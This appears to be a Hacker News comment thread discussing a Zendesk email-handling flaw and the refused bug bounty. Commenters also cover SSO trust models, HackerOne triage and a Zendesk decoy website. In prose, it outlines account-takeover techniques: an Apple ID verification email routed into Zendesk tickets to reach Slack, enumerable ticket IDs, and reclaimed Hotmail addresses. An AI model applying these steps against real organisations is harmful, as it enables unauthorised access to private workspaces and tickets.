In my head, authorization under @company.com would be delegated to a central directory, instead of relying on Apple ID. It is effectively an authentication bypass.
Zendesk paid me $500 4 years after I submitted a vulnerability to their bounty program on hackerone. It was a shock. There were default settings indexing internal docs/knowledgebase info to search engines.
I have been thinking about it for a while, but I no longer think email is worth the trouble. I am flooded with spam, the vulnerabilities are everywhere and locking them down near impossible.
Kids who are smart and curious have already been exposed to the internet since they were 8/9 years old. So a few years of learning they're already knowledgeable by the time they're in their teens.
No responsibilities and all the time in the world to learn with the right circumstances, they can go far.
Older devs who are experts in this area are already busy making money and working on their employer's security.
I once found a neat trick to highjack Facebook accounts; after MSN message died a lot of hotmail accounts were left to die also but a lot of people created their Facebook account using the @hotmail address. I tipped them about that they basically said F you.
>Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
Ah, yes, why do laymen always think this?
I mean, I get it, Krupp and mining towns used to be a thing, so it is possible.
But every big company should build a ticketing system?
Why not an email solution, OS, network routers too?
Are you not allowed to discuss a vulnerability you found when it is considered out of scope?
I mean it sounds weird to argue that you won't pay, but do not allow the person to talk about it anyway. Even more so if the person communicated with affected companies instead of some darknet marketplace.
Welp, they’re basically begging people to sell 0 days to a 3 letter agency // out of state groups (NSO, etc)
Come on, honor your bug bounty. Especially when it can bite you in the ass hard enough to plummet stock prices if a bug of this caliber is exploited in the companies you serve
My first thought (which is somewhat self-serving because I hate 3rd party sign on) is that this is a great case study for having only one method of sign-in.
lol $0 Companies cutting corners on security also skimp on paying bounties. No surprise there. The only possible exception are crypto bounties. Those are much bigger and a greater willingness to pay due to the stakes.
SMH and Zendesk responds the wrong way on his post. Guys, just pay the kid instead you're making business owners like me start recommending my friends and clients against using Zendesk...
I doubt we were the first. That is presumably the reason they failed to pay out.
The real issue is that non-directory SSO options like Sign in with Apple (SIWA) have been incorrectly implemented almost everywhere, including by Slack and other large companies we alerted in June.
Non-directory SSO should not have equal trust vs. directory SSO. If you have a Google account and use Google SSO, Google can attest that you control that account. Same with Okta and Okta SSO.
SIWA, GitHub Auth, etc are not doing this. They rely on a weaker proof, usually just control of email at a single point in time.
SSO providers are not fungible, even if the email address is the same. You need to take this into account when designing your trust model. Most services do not.
Imagine Bob works at Example Inc. and has email address [email protected]
Bob can get a Google account with primary email address [email protected]. He can legitimately pass verification.
Bob then gets fired for fraud or sexual harassment or something else gross misconduct-y and leaves his employer on bad terms.
Bob still has access to the Google account [email protected]. It didn't get revoked when they fired him and locked his accounts on company systems. He can use the account indefinitely to get Google to attest for his identity.
Example Inc. subscribes to several SaaS apps, that offer Google as an identity provider for SSO. The SaaS app validates that he can get a trusted provider to authenticate that he has an @example.com email address and adds him to the list of permitted users. Bob can use these SaaS apps years later and pull data from them despite having left the company on bad terms. This is bad.
I think the only way for Example Inc. to stop this in the case of Google would be to create a workspace account and use the option to prove domain ownership and force accounts that are unmanaged to either become managed or change their address by a certain date. https://support.google.com/a/answer/6178640?hl=en
Other providers may not even offer something like this, and it relies on Example Inc. seeking out the identity providers, which seems unreasonable. How do you stop your corporate users signing up for the hot new InstaTwitch gaming app or Grinderble dating service that you have never heard of and using that to authenticate to your sales CRM full of customer data?
When you're setting it up, you can choose what to do with any existing accounts that are part of your domain: kick them out or merge them in.
I don't see this as a vulnerability: how is Google supposed to know that a person has left the company? You let them know by deleting the account.
I don't know if Google is the best example here. Apple might be a better one:
1. User's work email is [email protected]
2. User creates Apple ID using their work email. Their Apple ID is [email protected]
3. User gets fired and their company email is deleted
4. User can still sign in to the SaaS apps using SIWA and their "company" Apple ID
It's worth noting that OAuth providers - like Apple - include information such as if they are authoratitive or not over a particular account.
If there's a way to do this, I would greatly appreciate a link or brief explanation, as our process for employee termination/resignation does involve disabling in the Google admin portal and if we need to be more proactive I definitely want to know.
There are legitimate reasons for this, e.g. imagine an employee at a company that uses Office365 needing to set up an account for Google Adwords.
So anyone with an example.com email can make a google account using that email as their login. Verify they have the email and that's their login. A common system for users who need to use google ads or analytics.
But when the company disables 365 login the google account remains. And if you use something third party that offers a "Sign in with google" then assumes because you have a google account ending "example.com" you are verified as "example.com" you've got access even if that account is disabled.
If you have the google admin portal this doesn't work as you're controlling it there. But signing up for Microsoft or Apple accounts with that google workspace address might have the same loophole.
This is the confusion — it’s reasonable to assume that the email is not a personal address.
I have no idea how this is supposed to work in practice for Github and Gitlab, where people gain access to non-public areas of those websites, but they are still expected to use their own accounts which they keep after leaving their employer.
(The enterprise-managed Github accounts do not address this because they prevent public, upstream collaboration.)
https://support.google.com/accounts/answer/176347?hl=en&co=G...
The reason is obvious: because a Google account gets you access to many a Google service without requiring you to open a Gmail account.
However, the question still stands: why does Google allow authentication with a non-Gmail/Workspace account? Yes, it would be confusing since not all Google Accounts would be made the same, but this entire class of security issues would disappear.
So it's the usual UX convenience vs security.
Alternative "fix" that's both convenient and secure is to have every company use Google Apps on their domain ;-)
Any OAuth provider should send a flag called "attest_identity_ownership" (false, true) as part of the uaht flow, which is set to true if the account is a workspace account or gmail (or the equivalent for other services), and false if the email is an outside email. Thus, the service handling the login could decide whether to trust the login or proceed otherwise, e.g. by telling the user to use a different OAuth service/internal mechanism where the identity is attested.
https://support.zendesk.com/hc/en-us/articles/8187090244506-...
Wow... there was no indication that they even intended on fixing the issue, what was Daniel hackermondev supposed to do? Disclosing this to the affected users probably was the most ethical thing to do. I don't think he posted the vulnerability publicly until after the fix. "Forfeiture of their award" -- they said multiple times that it didn't qualify, they had no intention of ever giving a reward.
For some of our bugs given on h1, we openly say, "Hey, we need to see a POC in order to get this to be triaged." We do not provide test accounts for H1 users, so, if they exploit someone's instance, we'll not only take the amount that the customer paid off of their renewal price, we'll also pay the bounty hunter.
Heads I win, tails you lose.
Edit: to those downvoting, the fact of the matter is that Zendesk's maximum bounty is far lower than 50k; yet OP made 50k; meaning by definition the value of the vulnerability was at least 50k.
THEN the researcher eventually goes public.
Later, Zendesk announces the bug and the fix and says there will be no bug bounty because the researcher went public.
Is that how it went? I mean if so, that's one way to save on bug bounties.
I am 100% certain that every one of the companies that paid the researched would consider the way this was handled by that researched "the best alternative to HackerOne rules 'ethical disclosure' in the face of a vendor trying to cover up serious flaws".
In an ideal world, in my opinion HackerOne should publicly revoke Zendesk's account for abusing the rules and rejecting obviously valid bug payouts.
For example, most Hackerone customers exclude denial-of-service issues because they don't want people to encourage to bring down their services with various kinds of flooding attacks. That doesn't mean that the same Hackerone customers (or their customers) wouldn't care about a single HTTP request bring down service for everyone for a couple of minutes. Email authentication issues are similar, I think: obviously on-path attacks against unencrypted email have to be out of scope, but if things are badly implemented that off-path attacks somehow work, too, then that really has to be fixed.
Of course, what you really shouldn't do as a Hackerone customer is using it as a complete replacement for your incoming security contact point. There are always going to be scope issues like that, or people unable to use Hackerone at all.
He should have said since its not going to be fixed, he will just inform the individual companies.
I'll note he did go to the effort of having the first stab at that sort of resolution, when he pushed back on HackerOne's inaccurate triage of the bug as an SPF/DKIM/DMARC email issue. He clearly understood the need for triage for programs like this, and that the HackerOne internal triage team didn't understand the actual problem, but again was rebuffed.
EDIT: It’s -11 (negative 11) now. Still “0 comments”.
I don't understand what this tries to accomplish. The problem is bad, botching the triage is bad, and the bounty is relatively cheap. I understand that this feels bad from an egg-on-face perspective, but I would much rather be told by a penetration tester about a bug in a third-party service provider than not be told at all just to respect a program's bug bounty policy.
That doesn’t matter if your goal with a bug bounty program is not to have people reporting bugs, but instead to have the company appear to care about security. If your only aim is to appear serious about security, it doesn’t matter what you actually do with any bug reports. Until the bugs are made public, of course, which is why companies so often try to stop this by any means.
But I geuss corporations ignoring security for more immediately profitable ventures on the quarterly report is a tale as old as software.
Reading all the many comments, it would appear the damage has been done. Good. But very unnecessary on zd's part.
Another example of impotent PMs, private equity firms meddling and modern software engineering taking a back seat to business interests. Truly pathetic. Truly truly pathetic.
Directory SSO: These are systems like Google Workspace or Okta, which maintain a central directory of users and their access rights.
Non-directory SSO: These are services like "Sign in with Apple" (SIWA) or GitHub authentication, which don't maintain such a directory.
IdentityServer4 [0] is no longer maintained [1] but had SSO support and the source is still on github.
[0] - https://identityserver4.readthedocs.io/en/latest/
[1] - They had to go commercial to stay afloat, there wasn't enough contributions from community/etc. That said it's pretty cheap for what it does in the .NET space.
Whereas you can (and I believe always could*) create an apple ID with any old email address.
*Maybe this delinked situation only came about when they added the App Store to OS X, and figured they'd make less money if they require existing Mac users to get a new email account in order to buy programs in the manner which would grant them a cut.
Apple has a list of all the email addresses for its sole IDs, but it doesn't control them, and having one deleted doesn't nessisarilly affect the other.
Google and custom domain email have always been delinked from this perspective. You could create a Google account with a custom domain and then point the domain elsewhere or lose control of it, and you'd still retain conto of the account.
Basically, the required example essentially theoretical at this point - maybe it works for employers at companies that also happen to provide SSO services. So if you work at Facebook, Google, Apple, or github and have a [email protected] email dress, and you signed into slack through the SSO that affiliated with your company and the company email, but later don't work there and you've had your work account access revoked, you won't be able to use that SSO to sign into slack. That's what they mean by directory control or whatever.
In contrast, if you sign up to github with your work email account, unless it's a managed device managed by your work, your work doesn't actually control the account. They just vouched for your affiliation at sign up when you verified your email. So if you use a github SSO to sign up for a service that 'verifies' your work email address from github during the process, that won't change when you leave and the company revoked access to the email. Github SSO, in this case, isn't verifying you have an email account @company.com. They are verifying you once did, or at least once had, access to it. This is what they mean by the non-directory whatever.
Similar with Apple, if you were signing in with an @icloud.com, it's pretty good proof, but if you have an Apple ID with a third-party e-mail it's not proof of current control of that e-mail.
That's my guess.
Also, is it impossible to have a Google account with a non-gmail address? The original poster seemed to be saying that Google _is_ a directory SSO and Apple _is not_ categorically. But if you can have a Google account without a Gmail-ran email account, wouldn't Google have the same vulnerability?
Google accounts have the exact same issue so I don't understand the distinction made by the OP though.
You can have your own domain if it is a workspace account
This can be done with an account that you once had control over but don't anymore, like if you leave an employer.
You can't send mail from it, but many apps will take having a google account with a given email is proof of ownership, or an @example.com email address is proof that you are an employee of Example Inc. when they are a customer of the app and have a tenant set up.
I get there's a convenience factor, but even more convenient is the password manager built into every modern browser and smartphone. If the client decides to use bad passwords, that's will hurt them whether or not they're using SSO.
The $50k was from other bug bounties he was awarded on hackerone.
It's too bad Zendesk basically said "thanks" but then refused to pay anything. That's a good way to get people not to bother with your big bounty program. It is often better to build goodwill than to be a stickler for rules and technicalities.
Side note: I'm not too surprised, as I had one of the worst experiences ever interviewing with Zendesk a few years back. I have never come away from an interview hating a company, except for Zendesk.
And possibly to have blackhats to start looking more closely, since they now know both 1) that whitehats are likely to be focusing elsewhere leaving more available un-reviewed attack surface, and 2) that Zendesk appears to be the sort of company who'll ignore and/or hide known vulnerabilities, giving exploits a much longer effective working time.
If "the bad guys" discovered this (or if it had been discovered by a less ethically developed 15 year old who'd boasted about it in some Discord or hacker channel) I wonder just how many companies would have had interlopers in their Slack channels harvesting social engineering intelligence or even passwords/secrets/API keys freely shared in Slack channels? And I wonder how many other widely (or even narrowly) used 3rd party SaaS platforms can be exploited via Zendesk in exactly the same way. Pretty much any service that uses the email domain to "prove" someone works for a particular company and then grants them some level of access based on that would be vulnerable to having ZenDesk leak email confirmations to anybody who knows this bug.
Hell, I suspect it'd work to harvest password reset tokens too. That could give you account takeover for anything not using 2FA (which is, to a first approximation over the whole internet, everything).
As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets. I would have expected that the price on the black market for these kind of bugs are several figures larger.
Also the bit about SPF, DKIM and DMARC seems to show a misunderstanding of the issue: these are typically excluded because large companies aren't able to do full enforcement on their email domains due to legacy. It's a common bug report.
In this case, the problem was that Zendesk wasn't validating emails from external systems.
The audacity to say "this is out of scope" then "how dare you tell anyone else" is something else.
Correct, the replies seem to have come from H1 triage and H1 mediation staff.
They often miss the mark like this. I opened a H1 account to report that I'd found privileged access tokens for a company's GitHub org. H1 triage refused to notify the company because they didn't think it was a security issue and ignored my messages.
While it's unclear at which stage Zendesk became involved, in the "aftermath" section it's clear they knew of the H1 report, since they responded there. And later on the post says:
"Despite fixing the issue, Zendesk ultimately chose not to award a bounty for my report. Their reasoning? I had broken HackerOne's disclosure guidelines by sharing the vulnerability with affected companies."
The best care scenario as I see it is that Zendesk has a problem they need to fix with their H1 triage process and/or their in and out of scope rules there. And _none_ of that is the researcher's problem.
The worst (and in my opinion most likely) scenario, is that Zendesk did get notified when the researcher asked H1 to escalate their badly triaged denial to Zendesk for review, and Zendesk chose to deny any bounty and tried to hide their vulnerability.
> As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets.
I think it's way worse than that, since internal teams often share logins/secrets/API keys (and details of architecture and networking that a smart blackhat would _love_ to have access to) in thei supposedly "internal" Slack channels. I think the fact that non Zendesk "affected companies" paid out $50k sets that as the absolute lower bound of "the real value of those bugs. And it's _obvious_ that the researcher didn't contact _every_ vulnerable Slack-using organisation. I wonder how much more he could have made by disclosing this to 10 or 100 times as many Slack using organisations, and delaying/stalling revealing his exploit POC to Zendesk while that money kept rolling in?
I'll be interested to see if HackerOne react to this, to avoid the next researcher going for this "second level" of bug bounty payouts by not bothering with H1 or the vulnerable company, and instead disclosing to companies affected by the vulnerability instead of the companies with the vulnerability? It's kinda well known that H1 buy bounties are relatively small, compared to the effort required to craft a tricky POC. But people disclose there anyway, presumably party out of ethical concerns and partly for the reputation boost. But now we know you can probably get an order of magnitude more money by approaching 3rd party affected companies instead of cheapskate or outright abusive companies with H1 bounties that they choose to downvalue and not pay out on.
I think it's just laziness. Plus they hire previous famous reporter as the people triaging the reports, those famous people know other famous people first hand, they usually think "hmm, unknown guy, must have ran a script and submitted this"
I have stopped reporting stuff since last 5 years due to the frustration. And it seems the situation is still the same even after so many years.
I believe their logic was that only the domain owner can adequately prevent email spoofing by proper SPF/DMARC configuration, and that it’s the customers’ fault if they don’t do that. Which isn’t entirely wrong.
When you stand up a bug bounty program you get a ton of "I opened developer tools, edited the js on your page, and now the page does something bad" submissions. "I can spoof some email headers and send an email to myself that looks like it is coming from you" isn't something I've specifically seen due to some weird details about my bounty program but it is something I would absolutely expect for many programs to see.
So you need a mechanism to reject this stuff. But if that mechanism is just "triage says this is dumb" you get problems. People scream at you for having their nonsense bug rejected. People submit dozens of very slightly altered "bugs" to try to say "you rejected the last one for reason X but this one does Y." So you create a general policy: anything involving email spoofing is out of scope.
So then a real bug ends up in front of the triage person. They are tired and busy and look at the report and see "oh this relies on email spoofing, close as out of scope." Sucks.
I think that Zendesk's follow up here is crap. They shouldn't be criticizing the author for writing about this bug. But I do very much understand how things end up with a $0 payout for the initial report.
Zendesk wasn't validating the email senders.
> Create an Apple account with [email protected] email and request a verification code, Apple sends verification code from [email protected] to [email protected] and Zendesk automatically creates a ticket
It's a clever attack.
(Of course, if you have ever recieved e-mail from an address @id.apple.com, you would see the selector name in the DKIM signature header, and could look up the corresponding DKIM record directly. The above method is for when you don’t have access to that.)
Maybe someone wants to post a link?
Strictly, $0 because he disclosed to customers. But he only disclosed to customers since Zendesk said it was out of scope.
Bad showings all around, for both HackerOne and Zendesk.
Indeed, but just you wait for Zendesk to say "well, _we_ didn't mark it out of scope!" as if delegating it to h1 renegades all responsibility.
But simultaneously you should not be able to get into a company Slack by simply having an account with a @company.com email address created by a third-party SSO provider.
In other words, even in Zendesk fixed their problem, Slack would still have a problem on their end.
https://github.com/mdowd79/presentations/blob/main/bluehat20...
The same presentation also mentions (starting slide 17) how the requirements of 0days differs from public research, which is why some vulnerabilities would be difficult to sell.
Don't forget that most people also simply don't sell bugs. They're not for sale in the first place; the bounty would be a thank-you or nice bonus, not a replacement for selling it
I'm certainly not in a criminal bubble so I can't say how big the other side is, but (as a security consultant who knows a reasonable number of hackers) I doubt that I know anyone who'd choose, after getting no response from the company, to sell a bug for profit to a louche party rather than going full disclosure and warning everyone -- or just doing nothing because it's not like it's their problem
Edit: nvm someone did come to mind. We tried to steer them onto the right path at our weekly CTF team meetings but I'm not sure we succeeded. Anywho, still one to a few dozen
Software Exploits arent considered arms it is information that can be sold, the liability is on the person that does the unauthorized access, the person that steals data, the person that uses the data
Hacking syndicates distribute liability akin to any corporation
not about else and especially not for merely browsing or using or buying a legal good from a dark net market
as I wrote
Which is almost always the person finding the bug. Most services include language that limit your ability to find vulnerabilities in their systems as part of being allowed to access their service. If you find the vulnerability without ever accessing the service you might have an out, but that also means you have to sell the exploit with less ability to convince the buyer that it is something significant.
who would then argue they also sold it to security researchers, journalists and assumed everyone was or didnt discriminate or have any intent at all
Same thing happened to me years ago. Interviewed with them and it was the worst “screening” experience I ever had. After getting a rejection email, I thanked them for their time and said I had feedback about the interview should they want to hear it. They said yes, please.
Sent my feedback, never heard from them again.
Proper response would be to update your program to triage these vulns and thank the researcher for not going public straight away. This current approach is burning a tremendous amount of goodwill.
I don’t care if you’re the only company in the market, I’ll still blackball you for this in my recommendations.
Zendesk should pay up, apologize and correct their bug bounty program. After doing so, they should kindly ask the finder to add an update to this post, because otherwise it will follow them around like dogshit under their shoe.
If a company loses 120 million a year to security bounties, they will take into account the cost of scrumming/rapid widget delivery.
They should absolutely inform a client company of a perceived threat, when they agree on the threat
Most of the person’s post and responses here are about Zendesk’s issue, but Zendesk was never informed
for a better PR response, I think now Zendesk could reward this after realizing it wouldnt have been disclosed first, and admonish HackerOne for not informing them and the current policies there
If you are a new user expect your first couple reports to be butchered. It seems to me only reports from well known hackers gets carefully analysed.
It's not clear whether they were informed. The mediator's email says "after consultations with *the team*", which is likely referring to Zendesk's security team.
Incredible. This must be some kind of "damaged ego" or ass-covering, as it's clearly not a rational decision.
Edit: Another user here has pointed out the reasoning
> It's owned by private equity. Slowly cutting costs and bleeding the brand dry
1) created for the purpose of either PR/marketing, or a checklist ("auditing"), 2) seen as a cheaper alternative to someone who knows anything about security - "why hire someone that actually knows anything about security when we can just pay a pittance to strangers and believe every word they say?"
The amusing and ironic thing about the second point is that by doing so, you waste time with the constant spam of people begging for bounties and reporting things that are not even bugs let alone security issues, and your attention is therefore taken away from real security benefits which could be realized elsewhere by talented staff members.
The company even ran special sessions where engineers and hackers were brought together to try to maximize the number of bugs found in a few week period.
It resulted in more secure software at the end and a community of excited researchers trying to make some money and fame on our behalf.
The root cause in this case seems to be that they couldn’t get by HackerOne’s triage process because Zendesk excluded email from being in scope. This seems more like incompetence than malice on both of their parts. Good that the researcher showed how foolish they were.
That said putting my security hat on, I have to ask - who thought that sequential ticket ids in the reply-to email address were a good idea? they really ought to be using long random nonces; at which point the "guess the right id to become part of the support thread" falls apart. Classic enumeration+IDOR. So it sounds like there's still a potential for abuse here, if you can sneak stuff by their filters.
The implications of being able to read arbitrary email contents from arbitrary domains' support (or otherwise) addresses are well known, and any competent security personnel in ZenDesk's security team should know this is exactly what can happen.
Something similar has been discussed on HN before: https://news.ycombinator.com/item?id=38720544 but the overall attack vector of "get registration email send to somewhere an attacker can view it" is not novel at all; it's also how some police database websites have been popped in the past (register as @fbi.gov which automatically gives you access; somehow access the inbox of @fbi.gov due to some public forwarding, for example)
There was a PoC of how to view someone else's ticket (assuming you know the other person's email and approximately when the ticket was filed).
>it's not crazy to think a security engineer reading the report may assume that stuff would cover their butts
It sounds like they got a report saying "I can spoof an email and view someone else's report". Why would they assume the spam protection would protect them when they have a report saying it's not protecting them?
In general, I do expect for the folks reading hackerone reports to make some mistakes; there's a lot of people who will just run a vulnerability scanner and report all the results like they've done something useful. Sometimes for real bugs you have to explain the impact with a good "look what I can do with this."
Also, the poster didn't share their submission with us, just the responses. So it's hard to know how clear they were to zendesk. A good bug with a bag explanation o would not expect to get paid
I'm not sure. Anybody that keeps up to date with security (e.g. those working in a security team) should know that ticketing systems also contains credentials sometimes. For example when Okta was breached, the main concern was that Okta support tickets contain.... session tokens, cookies, and credentials!
https://www.bleepingcomputer.com/news/security/okta-says-its...
What's the point of having a security team that can't directly link external experience to their own system? Learning the same mistakes that have already been known?
The company did fix the issue a few months later, so there's that.
It’s an imperfect system I agree - but it’s the best we have
- handled with priority, but sometimes it takes a couple of weeks for a more definite fix
- handled by the security department within the company ( to forward to relevant PO's and to follow up)
The unfortunate thing about bug bounties is that you will be hammered with crawlers that would sometimes even resemble a DDOS
you mean your product will be hammered by people testing to find holes, thus garner the bounty? or some other reason?
Eg. Testing all vulnerable wp plugin paths on all domains. Multiple times a minute
It doesn’t make sense, companies with less revenue aren’t the ones doing this. It’s usually the richer tech companies.
Because for some reason, it's larger tech companies that love to bean-count their way through security.
So my argument is that it does not matter how much they spend on security they will get hacked anyway, only thing they can do is keep spending in check and limit scope of hacks.
A great blog post on the matter https://www.troyhunt.com/beg-bounties/
Edit: nevermind, I see what you mean. Twitter embeds work, direct images don't.
I'll give an "another side" perspective. My company was much smaller. Out of 10+ "I found a vulnerability" emails I got last year, all were something like mass-produced emails generated based on an automated vulnerability scanning tool.
Investigating all of those for "is it really an issue" is more work than it seems. For many companies looking to improve security, there are higher ROI things to do than investigating all of those emails.
[0] - https://sqlite.org/forum/forumpost/53de8864ba114bf6
In one specific instance, we had 20 emails in a single month about a specific Wordpress PHP endpoint that had a vulnerability, in a separate market site in another domain. The thing is, it had already been replaced by our Wordpress contractor as part of the default install, but it was returning 200.
But being a static page didn't stop the people running scanners from asking us from money even after they were informed of the above.
The solution? Delete it altogether to return 404.
The logic being that any actual security-researcher with even minimal levels of competency will know to check the security.txt file and can follow basic instructions; while if any of our actual (paying) users find a security issue then they’ll go through our internal ticket site and not public e-mail anyway - so all that’s left are low-effort vuln-scanner reports - and it’s always the same non-issues like clickjacking (but only when using IE9 for some reason, even though it’s 2024 now…) or people who think their browser’s Web Inspector is a “hacking tool” that allows anyone to edit any data in our system…
And FWIW, I’ve never received a genuine security issue report with an admission of kitchen refrigeration of fruit in the 18 months we’ve had a security.txt file - it’s almost as-if qualified competent professionals don’t operate like an embarrassingly pathetic shakedown.
They also had a security.txt file and had received several emails through that, but all of it was spam. Ironically they had received more real security vulnerabilities through people contacting them on LinkedIn than through their security.txt file.
Your milage may vary, but it didn’t seem like the security.txt file was read by the people one would hope would read it.
But after the PoC that showed the severity in a way that anyone could understand, they still didn't pay. That's the issue. The whole investigation was done for them.
- chat stuff you can embed into your site for user support
- managed call center software
- knowledgebase management linking all the other services
- whitelabel consumer forums you can use for offloading some of the support
- a shitton of analytics
- sales CRM
- profile platform you can link to various sources of information to get info on their activity on your site, so that you can use that for support
And there is probably a few more. Sales CRM alone can be its own company.
As usual on hackernews there is a lot more to it, but you are just not exposed to it.
To ease concerns about our scalability and longevity, we move from a tiny office to an office with a lot of empty space.
This strategic move supposes signaled to prospective corporate clients that we were committed to sustaining our solution over the long term, rather than just a few years but in the end the company went out of business. so much for that.
I wish I was kidding. Used to work at a place that did crap like that, pulling in developers for these time sucks because "only they really know the correct technical usage for our industry."
Smells like being afraid to make a choice, even a tiny one.
Building at scale without racking up big bill and hitting SLAs require a decent amount of effort.
And the common management approach to anything not working immediately is "throw another 1.000 employees into the project" and the middle-managers measure their success by how many employees they are managing so it's a train without breaks. Hope it goes bankrupt soon.
If you can't get one story through in a week, you start a bunch of them so one finishes every few days.
What’s more insane is that it is still better than the vast majority of ticketing software. I don’t know what it is about ticketing and Helpdesk that it ALwAYs ends up like that.
The curse of B2B software is that every new big customer wants some custom feature or configuration that is the "deal breaker" for their multi-million dollar contract signing. And everyone except engineering is eager to give it to them because it's not their problem once the ink is dry. Support and renewals are the next guy's problem.
Like any SaaS, the more feature boxes you check, the more potential customers you can "satisfy". And the worse the UX gets for the average user (which then gets driven to purchasing more support).
Great for business (the few), terrible for users (the many). No contradiction there.
Now, I understand there's probably a lot more to it which is why I would expect it to be a company of around 50 engineers and 150 business/marketing/etc and that's being generous.
The hill I'd die on is that, with money not being a scarce resource and a technically feasible challenge present, a team of 200 should be able to build and sustain almost anything in the world. And that's being even generous. I think realistically a team of 50 should be able to build almost anything
You have to admit it's a very social job, talking with lots and lots and lots of people
Now, I understand there's probably a lot more to it which is why I would expect it to be a company of around 50 engineers and 150 business/marketing/etc and that's being generous.
The hill I'd die on is that, with money not being a scarce resource and a technically feasible challenge present, a team of 200 should be able to build and sustain almost anything in the world. And that's being even generous. I think realistically a team of 50 should be able to build almost anything
Later
I wrote this comment before rereading the original post and realizing that they had literally submitted a DKIM report (albeit a rare instance of a meaningful one). Just to be clear: in my original comment, I did not mean to suggest this bug was silly; only that in the world of security bug bounties, DKIM reports are universally viewed as silly.
only thing that matters is the severity and what it allows the attackers to do.
>In addition to this, we also implemented filters to automatically suspend the following classes of emails: User verification emails sent by Apple based on the Reply-To and Message-Id header values Non-transactional emails from from [email protected] Over the coming months, we will continue to look into opportunities to strengthen our Sender Authentication functionality and provide customers with more gradual and advanced security controls over the types of emails that get suspended or rejected.
So is it still possible to hijack anyone's support tickets using the default configuration of Zendesk if you just happen to know their email and ticket ID?
Zendesk is very well aware of SPF/DMARC, from their support pages.
https://gist.github.com/hackermondev/68ec8ed145fcee49d2f5e2b...
[1] https://gist.github.com/hackermondev/68ec8ed145fcee49d2f5e2b...
Yes, the researcher could have tee'd himself up better, but this says way more about zendesk than it does about the 15-year-old researcher.
It's possible that some chains could have credentials or other sensitive information in ticket chains.
Clearly Zendesk needs to change things so that the email address that is created for a ticket isn’t guessable.
Of course, this is only a good strategy if you're just wanting to do a good deed and not counting on getting more than a thank you note, but Zendesk or Hackerone (whoever you want to blame here) didn't even accept the bug in the first place. That's the problem here, not the omission of an exploit chain
We add impact demonstrations to a few findings per pentest report because our audience is broader: the nontechnical people who decide to allocate the money need to understand why this is useful and that the devs/sysadmins need to get enough time to do things right (developers and sysadmins are often sufficiently skilled, but are under delivery pressure). A sufficiently technical team, when the bug is adequately explained, doesn't need a functional exploit to see it's real/impactful or not
The reason people don't do this is because they think they have something that can be modified into another bug. Which is exactly what happened here.
White hat hackers do not require companies to pay them in exchange for not revealing a bug---the reveal of a bug only happens if a company doesn't fix that bug. Companies can be jerks and refuse to pay anything. That doesn't give you the right to blackmail them---you and other security researchers can just refuse to help them in the future.
A refusal to fix the vulnerability is what happened in the original blogpost, so it was fair game for release since the company doesn't care.
Hackers that don't care about ethics or legality won't bother blackmailing companies with vulnerabilities. They'll sell or use the vulnerability to steal more important data, and blackmail companies for millions of dollars in crypto.
I also disagree that there's anything ethically dubious about it.
After they decided not to work on it, they later came back and asked him for more information and treat it like a bug...
Author should have gotten a reward. Did everything right if Zendesk claims it's not a in scope bug.
The incident almost certainly cost Zendesk more in (according to the gist) lost contracts and reputational damage than it would've cost to pay the security researcher a bounty.
For a sensible large company, it’s not worth being stingy over (relative) pennies. They waste money like it’s water. They might as well spend where it matters. Bug bounties won’t even show on their bottom line, but cleanup for an exploited issue will.
They created a fake band called "Zendesk Alternative" just in an attempt to pollute the Google results if you search for an alternative to Zendesk.
http://zendeskalternative.com/
While not illegal, it shows the way they think, a sort of manipulative pettiness.
But also, SECURITY culture concerns beat culture culture. Companies should def consider ditching them for this lapse and their poor form in making it right.
If Zendesk is smart, they should hop on this thread and pay this kid out while everyone is still paying attention in one place, rather than later, when everyone is quietly making business decisions in a thousand little alcoves of the internet.
Otherwise, this is the best thing to happen to the Zendesk Alternatives in a long time
I'm actually pretty annoyed at the stupidity, it's the kind of thing that even a shitty search engine won't be fooled by and hey when I search for Zendesk alternatives I don't see any brand called Zendesk alternative in first few results.
I mean it's like they're too stupid to do what every other weaselly scumbag does, get some fake reviews up comparing your brand to alternatives with the reviews carefully weighted so your target customer base will be uh, I guess Zendesk is really what we want then.
Or at least buy an ad words for the search - with the words Zendesk - There is No Alternative showing up before all the alternatives.
It's ok Zendesk if you use my clever slogan because you can't think of one on your own - I'm not expecting you to pay me for it.
Searching `Zendesk alternative` (no s, no quotes):
- Google shows it in the top 5 results.
- Bing shows it on the second page.
- Brave shows it in the middle of the first page.
- DDG doesn't show it.
- Yahoo shows it on page 3
- Yandex doesn't show it
So no harm, no foul, right?
Calling yourself 'charmed' by an insecurity-driven marketing shtick that denies rational competition is certainly one reaction.
"The book burning was abhorrent, in principle. But the lights were so calm and the fire was so warm... I was actually kinda charmed!"
Also, anytime I search for "X alternative" the results are all AI-generated garbage anyway, so I'd welcome something quirky and original like this in my results.
Yes, that’s it. They paid their marketing team to do this to be funny.
It's the same reason why Google paid its marketing team to make a promo for Gmail Blue (back in 2013 when Google was still doing legitimately funny fake promos):
https://www.gmail.com/mail/help/intl/en/promos/blue/
That's evil!
I wouldn't read too much into this because one unmaintained old website will not going to make or break the SEO game of others.
Takes me back to a more innocent time of the Internet.
Search engine chaff has been in the toolbag of "reputation management" PR firms for a while. Boris Johnson (former UK PM) deployed it many years ago to drown out a viral picture of him in front of a red bus bearing an ad he no longer wanted to associated with, so he was coached to tell an interviewer he has a hobby of painting model buses red.
And in 2027, Zendesk finds that the strategy worked. A little too well! Now the top search result for Zendesk is the rock band, and if you ask an AI about Zendesk, the AI starts yappin about a rock band too! Hahaha
that is hilarious, but also the most non punk rock thing I've ever read. if Apple did it, every one here would be fawning over how genius of a move it were
I love the self report :^)
Edit: Why don’t they seem to value their credibility?
Ironically, the domain was given to DDG from Google.
To Daniel/hackermondev: whatever you're doing, keep it up!
This architecture makes 0 sense to me. Even if an org has totally outsourced its identity and auth management to Google (is this possible?), presumably that would include controls over how new @targetorg.com identities are created on the Google end.
No F500 companies are using Apple as an identity provider since they definitely don't sell such services. So why would an F500 company configure Slack to allow Apple OAuth & introduce this vulnerability?
